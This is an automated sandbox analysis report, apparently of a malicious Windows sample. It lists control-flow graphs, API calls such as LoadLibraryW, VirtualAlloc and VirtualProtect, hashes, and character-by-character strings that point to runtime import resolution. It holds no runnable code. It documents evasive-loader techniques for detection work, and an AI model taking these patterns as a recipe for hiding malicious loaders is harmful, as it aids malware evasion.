                                                                          • Opcode Fuzzy Hash: 6bcf25f7376dcfef4b1cee5d05798b4a67e2137c0f87b421cf068cf447802002
                                                                          • Instruction Fuzzy Hash: D052E5A1D086A88EF7218724DC547AA7BB9EF91304F0480F9D44CA7282D67E5FD5CF62

                                                                          Control-flow Graph

                                                                          control_flow_graph 1136 82f90e-8305fd LoadLibraryW 1147 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 1136->1147 1148 8305ff-83061a LoadLibraryW 1136->1148 1159 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 1147->1159 1148->1147 1149 83061c-830637 1148->1149 1149->1147 1155 830639-830654 1149->1155 1155->1147 1155->1159 1211 833062 1159->1211 1211->1211
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: :PJ7$J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2644095800
                                                                          • Opcode ID: 8c380361ba80d1a1ed398a8d1df233f8191ccec12e04f719b0b3eda72e79ef91
                                                                          • Instruction ID: a0610c1fd34f193b46a86cb1a94b1c4c34390519117f474627b2752cbc37561f
                                                                          • Opcode Fuzzy Hash: 8c380361ba80d1a1ed398a8d1df233f8191ccec12e04f719b0b3eda72e79ef91
                                                                          • Instruction Fuzzy Hash: EC4205A1D086A89EFB218624DC547EA7B79EF91304F0480F9D44CA7282D67E5FC58F62

                                                                          Control-flow Graph

                                                                          control_flow_graph 1212 82f9e3-82fa22 1213 82fa34 1212->1213 1214 82fa24-82fa2e 1212->1214 1216 82fa3e-8305fd LoadLibraryW 1213->1216 1214->1213 1215 82f7ff-82f9d4 call 82f81f call 82f8f6 call 82f909 1214->1215 1215->1216 1227 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 1216->1227 1228 8305ff-83061a LoadLibraryW 1216->1228 1246 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 1227->1246 1228->1227 1230 83061c-830637 1228->1230 1230->1227 1239 830639-830654 1230->1239 1239->1227 1239->1246 1300 833062 1246->1300 1300->1300
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 0176a12da76e4eea0a0e60bf73e0ac39b9a7a9aa90e816a95e5e549cb7a39214
                                                                          • Instruction ID: 9c0eef0ce7d7605d9cdd1347d78c788d5eff9da88c799751140258a8fa483f19
                                                                          • Opcode Fuzzy Hash: 0176a12da76e4eea0a0e60bf73e0ac39b9a7a9aa90e816a95e5e549cb7a39214
                                                                          • Instruction Fuzzy Hash: 356203A1D046A88FFB218B24DC547EA7B79EF91304F0480F9D44CA7282D67A5FC58F62

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 5b89dfe9d3ec38d19b7166ee9fb7f25dec648d41a7c14bddf6d9c4d46abfd2a5
                                                                          • Instruction ID: adc937c162f5e6fffa87378c70f30b95f075700b61a50ae1a4bb1e09ef7f7bcb
                                                                          • Opcode Fuzzy Hash: 5b89dfe9d3ec38d19b7166ee9fb7f25dec648d41a7c14bddf6d9c4d46abfd2a5
                                                                          • Instruction Fuzzy Hash: C15203A1D046A88EFB218B24DC547EA7B79EF91304F0480F9D44DA7282D67E5FC58F62

                                                                          Control-flow Graph

                                                                          control_flow_graph 1385 82f946-82f956 1386 82f85b-82f931 call 82f8f6 call 82f909 1385->1386 1387 82f95c-82f969 1385->1387 1393 82f98d-8305fd LoadLibraryW 1386->1393 1388 82f977 1387->1388 1389 82f96b-82f975 1387->1389 1391 82f981-82f987 1388->1391 1389->1391 1391->1393 1407 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 1393->1407 1408 8305ff-83061a LoadLibraryW 1393->1408 1419 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 1407->1419 1408->1407 1409 83061c-830637 1408->1409 1409->1407 1415 830639-830654 1409->1415 1415->1407 1415->1419 1471 833062 1419->1471 1471->1471
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-2610222823
                                                                          • Opcode ID: 75c333e59389ae19ed56347aae69c2ebd2daafe5f6c13f84d3034dfe16d75862
                                                                          • Instruction ID: f4a56a4d52d39ef7b328e1d7d5c905162a9ea84e7d6dc30908952801726cc6ad
                                                                          • Opcode Fuzzy Hash: 75c333e59389ae19ed56347aae69c2ebd2daafe5f6c13f84d3034dfe16d75862
                                                                          • Instruction Fuzzy Hash: 9452F3A1D046A88EFB218B24DC547EA7B79EF91304F0480F9D44DA7282D67E5FC58F62

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 8227b72ff8227e4a86aa0844e00e752c506396859a83a6a127eef147f54919c1
                                                                          • Instruction ID: 776e2090317550b12ebae09b412be5773f9bbebe9e5201dc0532d4d83d1f7e1c
                                                                          • Opcode Fuzzy Hash: 8227b72ff8227e4a86aa0844e00e752c506396859a83a6a127eef147f54919c1
                                                                          • Instruction Fuzzy Hash: 4352F4A1D046A88EFB218724DC587EA7B79EF91304F0480F9D44CA7282D67E5FD58F62

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 08f73ee666e21a0eba55056523f2a5d62308f971d9a2e67c6a949d0252063e2e
                                                                          • Instruction ID: 38d5b5750e5eace9f2be650fc046ea424ae45e0d5bfea42af4419aff69c0eb3f
                                                                          • Opcode Fuzzy Hash: 08f73ee666e21a0eba55056523f2a5d62308f971d9a2e67c6a949d0252063e2e
                                                                          • Instruction Fuzzy Hash: D252F5A1D046A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 98f5de083789d617b5fbb1a78ca671abbe3211560ce0cdde577f0cd05afe31ee
                                                                          • Instruction ID: ca260aa6ea7cc2dffd0f466445cae8bad5a18f606276b31af4c08ef7eea72d7a
                                                                          • Opcode Fuzzy Hash: 98f5de083789d617b5fbb1a78ca671abbe3211560ce0cdde577f0cd05afe31ee
                                                                          • Instruction Fuzzy Hash: 4F42F5A1D046A88EFB218724DC587EA7B79EF91304F0480F9D44CA7282D67E5FD58F62

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: c681d19b26f91a482e53d726449cf044933ed3160262f7dccefa6fe4d5b6c5af
                                                                          • Instruction ID: 49bf248acc41f4d89d32d421b4e31a1adc5e4cc9c56ee6b11d97edc6d18edd71
                                                                          • Opcode Fuzzy Hash: c681d19b26f91a482e53d726449cf044933ed3160262f7dccefa6fe4d5b6c5af
                                                                          • Instruction Fuzzy Hash: A342F5A1D046A88EFB218724DC587EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 27e0c1f7354a7e0b19aa8a67b0c25058b8c82f02bb710c471e009f4fa9edf79e
                                                                          • Instruction ID: 24812eb9671029aa4a30a91e5c1dd776295526d9d577a2414225aebe26937dd4
                                                                          • Opcode Fuzzy Hash: 27e0c1f7354a7e0b19aa8a67b0c25058b8c82f02bb710c471e009f4fa9edf79e
                                                                          • Instruction Fuzzy Hash: D942F5A1D046A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: ed408d1d0b0f23f2d77129ecbd82e2af7012a3d939df1cb929a91f486d172283
                                                                          • Instruction ID: fdb1e9dbcc8691c5aa63ddcb0f0b38b0c16cf6f78fd4f511db1907961e8252d4
                                                                          • Opcode Fuzzy Hash: ed408d1d0b0f23f2d77129ecbd82e2af7012a3d939df1cb929a91f486d172283
                                                                          • Instruction Fuzzy Hash: B342E5A1D046A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282DA7E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 78f5124a3cdfe6714a43cc9ebd430ccfee4eb0b8e8da373711bc6244a92849aa
                                                                          • Instruction ID: 3bf83771312c42f5846319e231bd6858c75cf57e342640a4bd97c0cd4e3b498c
                                                                          • Opcode Fuzzy Hash: 78f5124a3cdfe6714a43cc9ebd430ccfee4eb0b8e8da373711bc6244a92849aa
                                                                          • Instruction Fuzzy Hash: 9642F4A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: f053897cc00dc23acf1833c6ee7bedaf0517b80750cbcdc13bc3f757622fb72c
                                                                          • Instruction ID: bd7e8994484039f3fab84bf0efb28d222e465164f584be4a5d5ed02ed682f545
                                                                          • Opcode Fuzzy Hash: f053897cc00dc23acf1833c6ee7bedaf0517b80750cbcdc13bc3f757622fb72c
                                                                          • Instruction Fuzzy Hash: 3D42F6A1D086A88EFB218724DC547EA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: b8573251eafd9ab0668fdc78b9b30b4750b498fe1d3181a55ed2b0d87cd372ef
                                                                          • Instruction ID: 47d3e6198fa9c15b35885a876343ff3ccace46f594134fec744c3728c597df3d
                                                                          • Opcode Fuzzy Hash: b8573251eafd9ab0668fdc78b9b30b4750b498fe1d3181a55ed2b0d87cd372ef
                                                                          • Instruction Fuzzy Hash: 2742F4A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 9631706f8314a25b86158f5b5e2e0399e21dd50341d698a91ff97565c4b3fc70
                                                                          • Instruction ID: f241ce9bf2eb8ffb5534f65eb2bb9a2142fd073167ad240755595c09499158c9
                                                                          • Opcode Fuzzy Hash: 9631706f8314a25b86158f5b5e2e0399e21dd50341d698a91ff97565c4b3fc70
                                                                          • Instruction Fuzzy Hash: 5942E5A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: J3LP$L$L$L$L$L3G:$P$W$W$ZR$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 1029625771-2610222823
                                                                          • Opcode ID: 7aa7afe0b7a8f4c5f14f78ae825382bdca5e618e18ffbbbd996cdec3db2466a2
                                                                          • Instruction ID: 1184a6cdca346784fcfe48383557e83afa36509adf2896f2d2ba1df68968b4c4
                                                                          • Opcode Fuzzy Hash: 7aa7afe0b7a8f4c5f14f78ae825382bdca5e618e18ffbbbd996cdec3db2466a2
                                                                          • Instruction Fuzzy Hash: E242E5A1D086A88FFB218724DC547AA7B79EF91304F0480F9D44CA7282D67E5FD58F62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H6N_$L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-2538332832
                                                                          • Opcode ID: 0faffd26a090a5b56aed7603f84964732a0a4ee6bd1e4268d06e9c1aac84eced
                                                                          • Instruction ID: 2b97e854133956e3592967f611684a35ca3ec27fd9dab5894f23660aa50d8f9d
                                                                          • Opcode Fuzzy Hash: 0faffd26a090a5b56aed7603f84964732a0a4ee6bd1e4268d06e9c1aac84eced
                                                                          • Instruction Fuzzy Hash: B342B0B1D082A88AEB25CB14DC84BEABB75FF95304F1480E9D44D97285D3799FC58F12
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: 901999c298bc38dfc5e2ec8f20e29d3289192b1aa63413ef46f6f17527206ee0
                                                                          • Instruction ID: a9bc510522347fff6a3a0882921c6818534a48ec5f0f12a0e14ac9c1d0e8b703
                                                                          • Opcode Fuzzy Hash: 901999c298bc38dfc5e2ec8f20e29d3289192b1aa63413ef46f6f17527206ee0
                                                                          • Instruction Fuzzy Hash: 9812E2A1D082A89BEB20CB24DC44BAABB75FF95304F1480F9D44DA7281D67A5FC5CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: 8a9747a18129eec8f4e6abb0e14d739c6c901f5f98f29740fcff3b211e1c916d
                                                                          • Instruction ID: 3bb6cfb2af9ef16f4bd146992d781ed991614edc28f9e549d91869d597eb02a4
                                                                          • Opcode Fuzzy Hash: 8a9747a18129eec8f4e6abb0e14d739c6c901f5f98f29740fcff3b211e1c916d
                                                                          • Instruction Fuzzy Hash: 0602F3A1D082A88BFB218B24DC44BAA7B75FF95314F0480F9D44DA7281D6BA5FC5CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: b713ed33a24c6ca816ce9c414c6b955ec63d275ef1d6bd9d4304fdfbbd282239
                                                                          • Instruction ID: 815a765e1f763aa792e5782b0b3c6ccb2516fb19a47b81935f6a530ab7b7a6d5
                                                                          • Opcode Fuzzy Hash: b713ed33a24c6ca816ce9c414c6b955ec63d275ef1d6bd9d4304fdfbbd282239
                                                                          • Instruction Fuzzy Hash: F8F103A1D082A88BF7218B24DC44BAABB75FF95314F0480F9D44DA7281D6BA5FC5CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: FP?3$L$L$L$Q$V$W$W$a$a$a$a$b$b$d$d$i$i$j@h$o$o$r$r$r$r$y$y
                                                                          • API String ID: 4275171209-303957544
                                                                          • Opcode ID: 0131136299ab2700db49823651ac1b5e7143e570323e4b9e835082648a1d4fb3
                                                                          • Instruction ID: 9bdfcfe6350df05d8240b64dabea767584e55417816df64a011eb89fd9ee2675
                                                                          • Opcode Fuzzy Hash: 0131136299ab2700db49823651ac1b5e7143e570323e4b9e835082648a1d4fb3
                                                                          • Instruction Fuzzy Hash: A0F1E2A1D082A88BF7218B24DC44BAABB75FF95314F0480F9D44DA7281D6BA5FC5CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-1115071425
                                                                          • Opcode ID: 975285dc871bd54dd34cefa1ed52bb1a8dd21f5e536f0d55c12267f8968ad2d6
                                                                          • Instruction ID: 24f5eb0fefe3eab5da588501ded5100bf7c3dc757d19a62257277698c70fee81
                                                                          • Opcode Fuzzy Hash: 975285dc871bd54dd34cefa1ed52bb1a8dd21f5e536f0d55c12267f8968ad2d6
                                                                          • Instruction Fuzzy Hash: 6D4237B1D082A88AE7248B24DC847EA7B75FF91304F1480FAD54DA7285D2799FC5CF62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-1115071425
                                                                          • Opcode ID: 904966624a5a3979faa50c337561ede41efa138299baf8ec7f07dd7bc8828456
                                                                          • Instruction ID: b94246b5a4ef13b3c6a0a1140ca98788156709c565d0e2a8b8a3c1898da5752c
                                                                          • Opcode Fuzzy Hash: 904966624a5a3979faa50c337561ede41efa138299baf8ec7f07dd7bc8828456
                                                                          • Instruction Fuzzy Hash: 5A2214B1D092988AEB248B24DC487EA7B75FF91304F0480F9D54DA7285D2B99FC5CF62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L$L$L$L$W$W$_R$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                          • API String ID: 0-1115071425
                                                                          • Opcode ID: dcf307e8b3009111cb01943d198f8515c68b5679d0f72ceb129436566c9753b8
                                                                          • Instruction ID: 97bf3c8ea94c723acad0d2bfdea060b5f28cf47cdc9bf479bea02fda60af306c
                                                                          • Opcode Fuzzy Hash: dcf307e8b3009111cb01943d198f8515c68b5679d0f72ceb129436566c9753b8
                                                                          • Instruction Fuzzy Hash: D41227B1D082988AEB248B24DC487EA7B75FF91304F0440F9D48DA7285D2B98FD5CF62
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,004BC769,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004BAB0B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: 2$2$E$P$c$e$e$e$i$o$p$r$s$s$t$x
                                                                          • API String ID: 544645111-3929738072
                                                                          • Opcode ID: 46bf316bc81deef2bec5f660764c07926ac3fb36aac3e29836616a3b585d7c81
                                                                          • Instruction ID: 4ee755ca57bb90c40dc99aa4956105e2e8bdedf706faa522e54f6aa31eb2e4ab
                                                                          • Opcode Fuzzy Hash: 46bf316bc81deef2bec5f660764c07926ac3fb36aac3e29836616a3b585d7c81
                                                                          • Instruction Fuzzy Hash: 400203B1D042589BF7208A24DC44BEB7BB9EB81314F14C0FAD84D56681DA7D5EC68F63
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
